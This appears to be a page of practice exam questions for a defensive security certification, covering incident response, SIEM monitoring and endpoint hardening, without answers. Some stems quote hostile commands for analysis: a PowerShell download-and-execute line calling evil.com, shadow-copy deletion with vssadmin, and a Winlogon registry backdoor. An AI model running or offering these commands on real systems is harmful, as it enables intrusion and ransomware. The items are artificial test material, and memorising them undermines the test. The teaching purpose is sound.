- A threat actor uses 'timestomping' on a compromised Windows system. What forensic impact does this technique have?
- An analyst is examining a suspicious Windows executable and wants to perform static analysis without executing it. Which technique provides information about what external libraries and functions the binary calls?
- During a major incident, multiple security teams are working simultaneously. The incident commander wants to ensure that decisions are documented and actions are coordinated. Which document serves as the central record of all incident actions, decisions, and timestamps?
- During an incident response engagement, a responder performs a triage on a Windows system using only built-in tools to avoid introducing foreign binaries. Which Windows built-in command shows all current network connections with their associated process IDs?
- During the Recovery phase of an incident, the team restores a compromised server from a backup taken 48 hours before the incident was detected. The attacker had been present for 5 days before detection. What critical problem exists with this recovery approach?
- A digital forensics examiner needs to recover deleted files from an NTFS volume. Which forensic concept explains why deleted files may still be recoverable?
- An incident response team is investigating a potential insider threat. An employee is suspected of copying sensitive data to personal cloud storage. Which artifact most directly evidences this activity on a Windows system?
- A CISO asks the IR team to ensure they have documented runbooks for the organization's top five likely incident scenarios. Which PICERL phase does creating these runbooks belong to?
- An analyst is investigating an incident and needs to determine if a suspicious binary is known malware. The binary's SHA-256 hash is available. Which resource provides the fastest initial lookup against known malware databases?
- An incident response team needs to preserve the integrity of evidence collected from a compromised server. Which hashing approach provides the strongest evidence of post-collection data integrity?
- A security team is investigating an attack where the adversary used a 'pass-the-ticket' attack. What Windows Kerberos artifact does this attack use and where is it stored?
- During incident response triage, an analyst discovers a suspicious process with PID 4812 running on a Windows system. The process is listed as 'lsass.exe' but the path is 'C:\Windows\Temp\lsass.exe'. What is the most important immediate action?
Domain 4: Continuous Security Monitoring (SIEM, threat intel, anomaly detection) · 32 questions
- A SOC receives threat intelligence indicating that an APT group uses a specific user-agent string in HTTP requests. Which SIEM query approach most efficiently detects this across all web proxy logs?
- A threat intelligence analyst receives an indicator of compromise (IOC) consisting of an IP address associated with a known botnet C2. The IOC is 6 months old. What factor most affects the reliability of this IOC?
- A SIEM rule is generating 500 alerts per day but only 2 are confirmed incidents. The SOC team is overwhelmed. What is this situation called and what is the best remediation?
- A SIEM analyst creates a use case to detect user accounts logging in from two geographically distant locations within a short time window. What type of detection is this?
- Which standard framework maps attacker techniques and sub-techniques to specific detection data sources and mitigation controls, making it highly useful for continuous security monitoring?
- A continuous security monitoring program tracks Mean Time to Detect (MTTD). A SOC reduces MTTD from 72 hours to 4 hours. What is the primary security benefit of this improvement?
- A threat hunter suspects an attacker is using DNS tunneling for data exfiltration. Which SIEM query characteristic most effectively detects this technique?
- A continuous monitoring program identifies a spike in failed authentication attempts against a domain controller at 2 AM. The attempts use valid usernames but wrong passwords. Which attack technique does this most likely represent?
- A SIEM correlation rule fires when a single user account logs in from more than 3 distinct source IP addresses within 10 minutes. An alert triggers for a service account. The analyst notes the service account is used by a load-balanced application cluster with 8 nodes. What should the analyst do?
- A threat intelligence platform receives a STIX 2.1 report describing an APT group's tactics. The report includes a Relationship object linking a Malware object to a Campaign object. What does this relationship describe?
- An organization collects logs from 500 endpoints but only retains them for 7 days before deletion to manage storage costs. A security incident is discovered 15 days after the initial compromise. What critical problem does this retention policy create?
- A SOC uses the MITRE ATT&CK framework to map coverage. An analyst notes that Technique T1055 (Process Injection) has no detection rules in the SIEM. What data source should be prioritized to build detection for this technique?
- A security operations center wants to measure how long it takes from when a threat is first observed in the environment to when it is fully remediated. Which metric does this describe?
- A security engineer is deploying a SIEM and needs to onboard Windows Domain Controller logs. Which Windows Security event category must be enabled via Group Policy to capture user account management events such as group membership changes?
- A threat intelligence team classifies IOCs using the Pyramid of Pain framework. Which level of indicator is most valuable and hardest for an attacker to change?
- An analyst is configuring a SIEM to baseline normal user behavior and detect anomalies. The SIEM vendor calls this feature UEBA (User and Entity Behavior Analytics). What specific advantage does UEBA provide over static threshold-based detection rules?
- What is the difference between a SIEM use case and a SIEM correlation rule?
- A SOC team wants to implement threat hunting to proactively find attackers who evaded existing detection. What best describes the threat hunting methodology?
- A SOC analyst observes a SIEM alert for an internal host making HTTP connections to 50 different external IP addresses in 10 minutes, all on port 80, with 8-byte responses and no follow-on traffic. What does this most likely indicate?
- Which threat intelligence sharing platform and protocol enables automated machine-to-machine exchange of threat indicators in a standardized format?
- A security operations team implements a security orchestration, automation, and response (SOAR) platform. Which primary benefit does SOAR provide over a traditional SIEM alone?
- A security operations team wants to reduce noise in their SIEM by implementing log source normalization. What does normalization accomplish?
- A SOC analyst receives a high-priority alert: 'Lateral Movement Detected — SMB connection from workstation to domain controller using local admin credentials.' What is the most critical first investigative step?
- A threat intelligence analyst wants to measure the quality of IOCs being consumed by the SIEM. Which metric most accurately reflects IOC quality in operational use?
- A SIEM is ingesting Windows Security event logs. An analyst wants to detect when an account is added to a privileged group such as Domain Admins. Which Windows Event ID should trigger the detection rule?
- A security analyst is building a detection for Kerberoasting in the SIEM using Windows Security event logs. Which Event ID indicates that a Kerberos service ticket was requested for an account with an SPN?
- A SIEM analyst creates a detection rule that fires when a user account logs in successfully after 5 or more failed attempts within 10 minutes. What attack does this detect and what are the potential false positive scenarios?
- An organization wants to implement a Security Operations Center maturity model. Which capability represents the highest maturity level?
- A threat intelligence analyst receives a report indicating that a specific APT group is targeting organizations in the same industry sector using spear-phishing emails with malicious PDF attachments. How should a defensive SOC operationalize this intelligence?
- A SOC analyst is building a correlation rule to detect Golden Ticket attacks in Active Directory. Which Windows Security event sequence is most indicative of a Golden Ticket attack?
- An organization wants to implement a vulnerability management program with risk-based prioritization. Beyond the CVSS base score, which additional factor most significantly changes the effective risk of a vulnerability?
- A security analyst is configuring a SIEM to detect potential data exfiltration. Which combination of data sources and correlation logic is most effective for this use case?
Domain 5: Endpoint Defense (EDR, OS hardening, app whitelisting) · 31 questions
- An endpoint detection and response (EDR) tool alerts that a process named 'svchost.exe' is running from the path 'C:\Users\Public\svchost.exe' and is making outbound connections. Why is this suspicious?
- An organization wants to prevent users from running unauthorized executables on Windows workstations. Which Microsoft technology provides application whitelisting based on publisher certificate, file hash, and path rules?
- A security team wants to harden Windows endpoints by disabling unnecessary services. Which service is commonly exploited for lateral movement and should be disabled on workstations where it is not needed?
- An EDR solution reports that a PowerShell script has been executed using the -EncodedCommand flag with a base64-encoded payload. What defensive control most directly prevents this technique?
- Which Windows security feature creates a protected, isolated region of memory to prevent credential theft tools like Mimikatz from extracting NTLM hashes and Kerberos tickets from LSASS?
- An organization deploys an EDR solution across all endpoints. What critical EDR capability allows the security team to remotely investigate a potentially compromised endpoint without physically touching the machine?
- A security engineer is hardening a Linux server and wants to restrict which processes can bind to privileged ports (below 1024) without running as root. Which Linux capability allows this on a per-binary basis?
- A Windows system has been compromised. An attacker added a registry value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options for 'sethc.exe' pointing to cmd.exe. What persistence and access technique does this implement?
- An organization deploys CIS Benchmarks for Windows 10 hardening. One control recommends setting 'Minimum password length' to 14 characters. An administrator argues this will cause user complaints. What is the security justification for this control?
- An EDR solution reports that a process (winword.exe) spawned a child process (cmd.exe) which then ran 'powershell.exe -nop -w hidden -enc <base64>'. What attack technique is most likely being executed?
- A security team wants to detect if any processes on Windows endpoints are injecting code into other processes. Which EDR telemetry event type most directly captures this activity?
- A Linux system administrator wants to implement mandatory access control (MAC) to enforce security policies on running processes, preventing privilege escalation even if a process is compromised. Which technology implements this?
- An organization wants to implement host-based intrusion detection on Windows servers. Which Windows logging capability, when enabled, provides visibility into command-line arguments used when processes are created?
- A security team discovers that attackers used 'mshta.exe' to execute malicious HTA (HTML Application) files hosted on an external server. Which application control measure most directly prevents this?
- A security administrator is reviewing patch management practices and finds that critical patches are taking an average of 45 days to deploy after release. A threat actor is known to exploit new vulnerabilities within 7 days of patch release. What risk does this gap create and what is the appropriate control?
- An organization deploys Windows Defender Application Control (WDAC) in audit mode. What does audit mode accomplish and why is it recommended before enforcement?
- A security engineer reviews a Windows system and finds that the built-in Administrator account (RID 500) is enabled and has no password set. What is the correct remediation?
- An EDR solution detects a process loading an unsigned DLL from the user's %TEMP% directory. The process is a legitimate Windows application. What attack technique does this indicate?
- An organization wants to reduce the risk from malicious macros in Microsoft Office documents received via email. Which defense is most effective for this specific threat?
- An organization wants to implement the principle of least privilege on Windows workstations. Currently, all users are local administrators. What is the primary security risk of this configuration and the recommended change?
- A security engineer is reviewing Windows Defender Exploit Guard settings. Which feature prevents untrusted DLLs from being loaded from UNC paths, protecting against DLL injection from network shares?
- An EDR tool detects that a process is using the Windows API call SetWindowsHookEx. What attack technique does this function commonly enable?
- A security administrator wants to ensure that users cannot disable or uninstall the corporate EDR agent. Which operating system feature enables this protection on Windows?
- An attacker uses the command reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /d C:\Windows\system32\userinit.exe,C:\Users\Public\backdoor.exe. What persistence mechanism is being established?
- An organization implements endpoint detection with process command-line logging. An analyst sees the following: powershell.exe -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1'). What technique does this represent?
- A security administrator wants to harden macOS endpoints by preventing unsigned applications from running. Which macOS security feature enforces this policy?
- An EDR console shows that an endpoint ran vssadmin.exe delete shadows /all /quiet followed by starting a ransomware encryption process. What was the purpose of the vssadmin command?
- An organization wants to prevent lateral movement via Pass-the-Hash attacks on Windows. Which control most directly mitigates this attack at the endpoint level?
- A security administrator wants to configure Windows to log all PowerShell script block executions for forensic analysis. Which Group Policy setting enables this capability?
- An attacker uses the technique of 'reflective DLL injection' to load a malicious DLL into a process without touching the disk. What makes this technique particularly effective at evading traditional defenses?
- An organization deploys host-based firewalls on all Windows workstations. Which Windows Firewall with Advanced Security configuration best limits lateral movement?
These questions are original practice material and are NOT actual exam questions or brain-dump content. All vendor marks are trademarks of their respective owners. This site is not affiliated with, endorsed by, or sponsored by the exam vendor.